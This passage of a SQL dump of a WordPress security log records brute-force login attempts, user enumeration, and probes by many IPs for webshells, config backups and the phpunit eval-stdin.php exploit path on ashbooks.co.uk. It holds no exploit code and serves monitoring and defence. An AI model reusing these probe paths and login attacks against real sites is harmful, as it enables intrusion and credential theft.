540,51,'HvgdIfC1TimKPDB0lSr9n8Jz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.5.25',3103917337,'admin',0,1637453447.9844,7,'yQL5EWcgDdzAtp628vlojsVr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('143.244.184.195',2415179971,'admin',0,1637454098.3763,7,'xvau6hGA9EZQ17Kj4gNJ5yYR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.61.254',1137524222,'admin',0,1637454747.5210,7,'WD4ZCzGeTuaihqtEAQYm6BFk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.105.209.130',577360258,'admin',0,1637455427.7901,7,'dawV8UneTAX9v3CJgGB54spE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('79.143.181.62',1334818110,'admin',0,1637456100.6440,7,'3HdrKa9oTe8BzVFLfXStk5xi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.144.126.104',2727378536,'admin',0,1637457014.0971,7,'Ulrsucj7JBE8DHodmWqXgx5w','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1637457828.3418,51,'lci0yaxuqvXM61zw2bfnNk8D','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('111.231.4.211',1877411027,'admin',0,1637458517.1784,7,'dPOYy72b3xlSX5VEKBiIu4QF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1637459296.8330,7,'xtLc9DHmkPWbFlKVj6GwadIu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.23.28',3468498716,'admin',0,1637460074.5553,7,'ZzpWCq10Gdn893JoYgv4KT6P','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.111.254.6',1601175046,'admin',0,1637460788.0094,7,'dwY9FmagnyMqiZNvb7AoQBLV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('143.198.162.183',2412159671,'admin',0,1637462222.4018,7,'OhQYHXMpbwr4gFtNRTIEAnsc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1637462859.0867,51,'O1PL9GZhuvdWnlB8FJ20e4TH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('74.214.24.238',1255545070,'admin',0,1637463913.0932,7,'dlZR3Tv4rIV6mzsqKkJHAWcF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.113.111.54',1567715126,'admin',0,1637464609.4478,7,'dU3RGq8k7Hz9lZixf6b1mWJD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.163.120',1168352120,'admin',0,1637465278.6367,7,'3nvLqlUZt1M7BzWse2Q8guNP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1637465953.2765,7,'4wdpqkB5JsvcEVCX2RfjKGZM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('75.119.143.160',1266126752,'admin',0,1637466629.6025,7,'30u6hiSI4JdLewCBtaHlNO59','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.69.109.132',574975364,'admin',0,1637467333.9809,7,'c5g9Fn0L3tTQmPSjvz8yMIO4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1637468910.4220,7,'IzeYp8HvXusFDMUPA2oEQnVr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.88',1920435032,'',0,1637469522.6073,55,'hCkip2XKxNuS4MeO1P03VbnZ','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('91.221.37.58',1541219642,'admin',0,1637469712.4034,7,'for38bVtuUBL2DFxZR5aTHiq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('118.27.30.151',1981488791,'admin',0,1637470319.9231,7,'ou5IwNzQtyfY2WcS84XrV3A7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.101.150.34',778409506,'admin',0,1637470866.6262,7,'CI3xNwgq0AbchnLEFHVjUtp8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.49.234.46',3140610606,'admin',0,1637472179.9578,7,'bnqjsi0PJhS8LHQEd34Wkt2c','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.172.230.112',1806493296,'admin',0,1637474006.6537,7,'Yk4KqQvX9nMZsjJP3lW2aSx5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.109.14.119',1047334519,'admin',0,1637474309.0892,7,'h5FopTX1Oj3SifyHc9NJtMVq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.236.154.81',3236731473,'',0,1637474581.5782,55,'wVBjroiGz8leApUhDvQR1uS6','','19|0|0|0|ashbooks.co.uk/wp-includes/upload_index.php'),('82.202.172.247',1389014263,'admin',0,1637475369.0941,7,'VoahEIZ3G49K0zLgdpHxO1te','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.241.123.16',603028240,'admin',0,1637476900.6073,7,'FCJSi65tvwzgslUxHdDTaZqL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.176.10',2917969930,'admin',0,1637477670.3120,7,'04o2QYwBPntACXugVziZelJ8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.223.9.22',1390348566,'',0,1637477792.8261,70,'oRzWSB8rDhV1uNkMqilfYpd5','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('91.238.164.176',1542366384,'admin',0,1637479385.6388,7,'G5AgZtY6fVq3n18jdwcShk40','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('77.240.13.186',1307577786,'admin',0,1637480139.7202,7,'w5H87BAojPcRzxMX2yEUGkgJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.221.37.58',1541219642,'admin',0,1637480876.9150,7,'R9v7aKhH6m0J5LNIq8jWZXCk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('65.108.51.66',1097610050,'admin',0,1637481540.4523,7,'0ZxjD2RasmHGJTVLKnqcpN78','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.247.244',2994796532,'admin',0,1637482256.4717,7,'T5i7hsnPxBle4CwqS61E9HL3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.124.187.110',578599790,'admin',0,1637483601.1497,7,'caPjNi0Y3kClzs7bpqx5t1wh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.61.254',1137524222,'admin',0,1637484350.8225,7,'I0knPW2NQp4tJHdgBxzcSVDa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.238.223.38',1508826918,'admin',0,1637485092.9140,7,'NZbSRUj0weh1MKkdcpmOxtI6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1637485120.4172,55,'I5rMgcJdiYHo7a2sKlqAOEx4','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('162.55.85.219',2721535451,'',0,1637485127.7259,55,'WuKGjAcorq74iSVEvQMX3hlH','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('162.55.85.219',2721535451,'',0,1637485131.0148,55,'GedsITjUbDkWVJavBZLnyu4g','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('45.90.216.111',760928367,'',0,1637488171.0985,55,'U4eCypJxicwtAOBGsIk2MXZj','','19|0|0|0|ashbooks.co.uk/lock360.php'),('69.30.231.154',1159653274,'admin',0,1637496896.4279,7,'mSwd9FztVkWgciDZqCyH5LnQ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.3.144.82',3221459026,'admin',0,1637498867.2641,7,'6ghiqeUVFlwYsI4SXovrkaCn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.61.254',1137524222,'',0,1637502822.6684,70,'1slZButiHcjoVGXrLvWb7aFM','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('75.127.5.31',1266615583,'admin',0,1637523257.3764,7,'TMKCk1SXsPhw0lgIbJDQraNB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.223.62.33',2682207777,'',0,1637523350.5891,55,'SwtOV8sNJkXo3QRyBfqrhDlx','','19|0|0|0|ashbooks.co.uk/administrator/index.php'),('157.245.156.140',2650119308,'',0,1637523843.0650,70,'Lj8rXPYvRa5s0No64tlfc9E1','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('107.150.48.238',1805005038,'admin',0,1637535051.8954,7,'SqUpXbeuOMZ4wLD7rIha6lxk','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('114.119.131.97',1920435041,'',0,1637535163.1082,55,'UXpLqZntI0GcYmoHevKOrhWJ','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('114.119.132.101',1920435301,'',0,1637545737.4142,55,'2UtYfhzOLTyNgexbQX9lrkoM','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('182.18.140.37',3054668837,'',0,1637571728.3920,70,'6bvS4f3MnZsRY5lJGVW7jPiK','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('45.158.15.146',765333394,'',0,1637579043.2140,55,'2urmlThJxNXSAqM3YLOZCgF8','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('45.158.15.145',765333393,'',0,1637582023.5086,55,'6cxknsuJSOCePE0DILb834WA','','19|0|0|0|ashbooks.co.uk/https://kalamazoo.pl/css/index.php'),('198.98.48.231',3328323815,'ashbooks',0,1637592760.0854,51,'RG7WH4mtJiyD8aeQuELX2KxI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.63.171',1805008811,'admin',0,1637595669.1889,7,'6q4nhHMSiytYvZrUb8jEX01z','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('159.223.62.44',2682207788,'',0,1637596402.9904,55,'lHNCcs0PVe5YEdJOaUf9AwZ8','','19|0|0|0|ashbooks.co.uk/wp/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596492.7589,55,'cZfeB42hd7NJDiux9Yg1MRXC','','19|0|0|0|ashbooks.co.uk/new/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596512.4311,55,'8cdzshFoGq0XxE9nuRfVYaUI','','19|0|0|0|ashbooks.co.uk/old/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596524.3261,55,'gzHi9rVtRGNpsfkWejFx3Odm','','19|0|0|0|ashbooks.co.uk/wordpress/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596531.6290,55,'v1Oqfml9JeTBW0pPu5nKD8CE','','19|0|0|0|ashbooks.co.uk/test/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596531.6630,10,'v1Oqfml9JeTBW0pPu5nKD8CE','','707|0|0|0|ashbooks.co.uk/test/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596537.5299,55,'3gF4qQBewsvh5ySolkZaD0Ui','','19|0|0|0|ashbooks.co.uk/blog/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596544.0816,55,'aURDjztSF1dv46LNHiVghGek','','19|0|0|0|ashbooks.co.uk/cms/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596551.9947,55,'lvjfV3LJSbhGN6iwDB84n2dF','','19|0|0|0|ashbooks.co.uk/web/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596561.1202,55,'zVAKZatH8rwR7JLPjfylQIeN','','19|0|0|0|ashbooks.co.uk/backup/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596572.0763,55,'CIh28rDntvaiRO9Am6j1wlbH','','19|0|0|0|ashbooks.co.uk/site/wp-admin/install.php'),('159.223.62.44',2682207788,'',0,1637596577.7354,55,'eBl52gHfFZL7PTOdYAVzJQW3','','19|0|0|0|ashbooks.co.uk/oldsite/wp-admin/install.php'),('84.239.46.7',1424961031,'admin',0,1637606053.3199,7,'mdu6GneUBjk83ZN4AQ1JIhRO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1637607288.6272,55,'P4JRG2p3r5XF0v8B9whdqVLi','','19|0|0|0|ashbooks.co.uk/css/index.php'),('162.55.85.219',2721535451,'',0,1637617978.2029,55,'QZrsaP8LzbJlFodjIV43hNc0','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('104.131.36.132',1753425028,'',0,1637620239.5712,55,'7Js5WzXmqaGnkgU9IL41ivOr','','19|0|0|0|ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php'),('104.131.36.132',1753425028,'',0,1637620296.5086,55,'nZLJt5qflCphXuG9USI7bMv6','','19|0|0|0|ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php'),('107.189.5.5',1807549701,'admin',0,1637625851.3227,7,'vyQXkSA6tnLhKoUgxGdJb0TV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'ashbooks',0,1637637061.8705,51,'u2P980cVZ3jxhGw7ieH6sUkF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.223.50.44',2682204716,'',0,1637639796.0946,70,'K36Fe0A4BczkOTvVbStmNdZQ','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('107.150.57.35',1805007139,'ashbooks',0,1637642309.1417,51,'3nQKdk7OiUFTAcV0wXsf4Nzt','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('107.150.57.35',1805007139,'fmoyjvuy5u',0,1637648978.6082,51,'aLwi5EUNmQ367FoqA0ZHsbTD','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637649417.7742,55,'GROYzVT2awe6HL5npCSs1W9q','','19|0|0|0|ashbooks.co.uk/assets/images/accesson.php'),('82.208.189.233',1389411817,'',0,1637651181.3373,55,'scR5jDyWb4nkZOgvEuHC0rh3','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('69.30.240.26',1159655450,'ashbooks',0,1637653981.8086,51,'URbwohANy63gd2GPIevsDnLu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'ashbooks',0,1637654560.9772,51,'Qdm2RWEXkIPZxKgyStfLwMY0','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637655591.8203,55,'pVvNsqWLDa6YgJ2Gu8ko0F7U','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637655603.6341,55,'PjHdQMAlsFmtIpW6e42zXDBC','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637655605.7512,55,'lAxcB1OgjMZ6n87DKV0PEoCa','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637655607.7780,55,'EWve4owmV7U9y2QJHZAiBfa1','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637655614.8913,55,'hZli0DgoSOx6zBJFHr5ysUjG','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637655614.9207,10,'hZli0DgoSOx6zBJFHr5ysUjG','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637655616.8108,55,'9FQ4J6bDGAfxhrzmk71MjCaZ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637655618.8374,55,'4Dzop7Z9JGriFPxdh8yg10AT','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637655621.0377,100,'t8YzTbAMp7io4wqh3dZ06KnO','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637655625.6890,100,'ofauWLGdIb6O9XxTiJtznFVR','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637655627.6190,100,'j8W6Cy1HfDg3TXNxzhJIpQbU','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637655629.8465,100,'RIDVCNPWypae36qQYlib7MzL','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637655631.8627,55,'sHMaDkYlVB5xWScu1f9NXPyG','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637655644.1703,55,'42YFZvsMUN0zCVkJfbQ3OWe8','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637655647.2198,55,'6ZYxrUsX5bujIDlniePc4KSq','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637655649.4963,55,'A9s38FriJgIzEDCGNPfjRacy','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637655651.6086,55,'gYxEasjJV4SUk7HKA98PtqhT','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637655653.9392,55,'qbVyTsJtvGzHnPp3i169M5Yj','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637655656.0864,55,'5wFoGBJHUASpKdZxXuDCI7Ta','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637655658.1871,55,'5KOqt7LwX4AzIikxo9CMrDYT','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637655660.7338,55,'CfYsFoJat2M6dmHUAqrQSgzL','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637655662.8538,55,'D5grvR9SUlo37swKIxkeE1fA','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637655664.8860,55,'g7RJ4yUhnTeQFwvONKsBW9ck','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637655666.8876,55,'qruVsE9QjHZa8pLUOf7YczwT','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637655668.7197,55,'IoJ5h7U6lrLt1gKWvnfeAMD2','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637655670.7431,55,'YK2izdeZWUEDrp4I8v319Tgt','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637655672.8219,55,'mR7Lx46svBHt8rhje23Cc9KZ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637655674.7208,18,'mM8y6x1aCVnSQOf9ptAd7P5N','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637655676.7490,55,'PytLQzUdW5vZFoh3CEerxVI2','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637655678.8955,100,'S1j4iQk3sJ6o9RpMrHcO0t8u','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637655681.0472,100,'N0TYD5S6oa7sXxtALh2fvKdn','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637655683.0963,55,'YNGbgCmHfMZnyOJR8oA1Bkhw','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637655685.2216,100,'ZRpTPzNGAIySDwbd65tLmg7Y','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637655687.0478,55,'uKzDTHBW5S9081hpeljknCfF','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637655688.8744,55,'RAn9tWSTwpaxvjzhuZMGNKX0','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637655690.9603,55,'HWwhMTDQpykncoIrd6EYuqVP','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637655693.0438,55,'wB5ZNxsYyr3IVjtelM8zAn4O','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637655695.2381,55,'FwWZBsNDrYTX9MLi0ofChpeq','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637655697.2033,55,'XO72ZMDmxQLY0S96CwV1zPlJ','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637655698.9344,55,'IfqiBPo8QX25ZDWYmAOkhUy3','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637655700.9798,100,'rZ9Dbs5WYkRL0uJTvaUdl7P8','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637655702.9678,55,'qB02awzTkJhxnZ8LvWPmGs7C','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637655705.2181,55,'yZ2PhMOJaXSVjGIl93k5dvxc','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637655708.1483,55,'O28s6hxFftQdRmCq4gvyYVaT','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('217.79.179.7',3645879047,'ashbooks',0,1637656050.5552,51,'BAXRpVrceU7wMfHPxKsCjuON','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657257.7353,70,'DGMxBqHFW6iJ50mRIlykthzT','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('178.128.179.32',2994778912,'',0,1637657258.0425,70,'eZTnaqfgDr5NVtuWX9x371bd','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('178.128.179.32',2994778912,'',0,1637657258.7255,70,'e60OiNk98KmL5lJv41cStZnI','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('178.128.179.32',2994778912,'admin',0,1637657260.2397,7,'BPmNOkjAzWVEnbMX1Z3gcQHd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'admin',0,1637657261.6496,7,'zygkTfCbw67BHEFxqOt3o9lL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'admin',0,1637657263.0279,7,'9ydUaSGf2AxDcYXLrCJMTW8u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'admin',0,1637657264.1160,7,'aWCmF1ZM26zy39DAbGc8TOLB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'admin',0,1637657265.1907,7,'Cy3uEtjlfVagenG1vPzSKkLs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657265.2148,10,'Cy3uEtjlfVagenG1vPzSKkLs','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657266.1601,50,'lmGR6Ke7ZNcYJMLHhpfw4Toa','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657267.1409,50,'P8uNVDfSl1E9Tm3RxOXZps0Y','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657267.8874,50,'8qTOhfi5eRbZ6SdBlLI3zVvY','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657268.8703,50,'em58sZE2zPRTopYCUrbQ0SNn','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657269.8532,50,'uR5LXHzlJ8ogkaitV7SIp41O','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657270.8758,50,'GvwkaEsChDrZyKVtIgHuzQ2f','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657271.7880,50,'Uv1saHhQIODLyPbZcoMK20iC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657272.7465,50,'cEkxGmQVyrgafo4s8KnqFNuW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657273.7246,50,'UOAQ0ucb1r8vomLlwyP2tTXG','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657274.7188,50,'DPkjUdZmFg4ycbrpsV0JtQER','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657274.7433,10,'DPkjUdZmFg4ycbrpsV0JtQER','','711|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657275.7122,50,'S7Uy3ve4zOhgVFnpGTNoqldw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657276.6864,50,'zyPXhQZieOdD6Vm9lnvtFkuf','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657277.6361,50,'AGfkm3zXvnlKpE54t7qJNIjF','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657278.6636,50,'1nb9UzQDvXi5BOCaFWRL0wAM','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657279.6979,50,'Sk1mMG4t5q0vC2W6iYKRBDrN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.179.32',2994778912,'',0,1637657280.7634,50,'2h1mpxvNEkc9y0MwKdVYauBW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1637660047.7223,55,'nlv4u5Pbx6o9IZ2EC8My0RjO','','19|0|0|0|ashbooks.co.uk/1index.php'),('137.184.220.57',2310593593,'',0,1637663380.6199,70,'tVY0JHGDOliPh98aXw3Luo1d','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.118.202',3233511114,'fmoyjvuy5u',0,1637667086.9747,51,'3fAw80utJa4NElLIcmRZn7ry','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'fmoyjvuy5u',0,1637671514.8879,51,'A27MjRED1GWIgYZSuBnsdFTL','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('173.208.152.235',2916129003,'ashbooks',0,1637681938.0631,51,'4W2xPCkeMOBHht9bTAIKX16d','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.197.160.228',1170579684,'fmoyjvuy5u',0,1637682762.0304,51,'D9VFlK2QvRAXJjipd4rk8mTC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637685383.8373,55,'JOozPAlrqSX3QWnMk4YyC1IE','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637685386.0832,55,'RwVOg1pPMHcSWXtuzl9AYTLC','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637685387.9307,55,'r8tBWnVp3HegqljciTNFhPSw','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637685390.0359,55,'XRuMqjv8EZ9aVHUApesiNoFt','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637685396.0707,55,'Fh0RAwBirgQp52PkuGbZdOEz','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637685396.1102,10,'Fh0RAwBirgQp52PkuGbZdOEz','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637685397.8024,55,'3xn75zm4sHpFdfXhD1vtoLSO','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637685399.5577,55,'unkZFHMzXK8vfGLsITDbOWVN','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637685401.4518,100,'PyU3QekW6c4LMrxlICsKbXFm','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637685404.9357,100,'YOGSeiaZJ9IxQTWDlodzthCn','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637685406.9071,100,'xfR9EgisYGaTULZrDvlPXpQy','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637685408.9426,100,'jUdnRLm54qMBfyYO8eNVrpcu','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637685410.7946,55,'GcVNRQB1pz23oSXOq5sg4FWY','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637685412.8924,55,'twFHW2TA1lSqB6yNJ0OshZaj','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637685415.0933,55,'Yi5Jx8lVa3stnwjMDu40fkRz','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637685416.9537,55,'0Xu7rFp5aLk6WBt3edUoEwAM','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637685419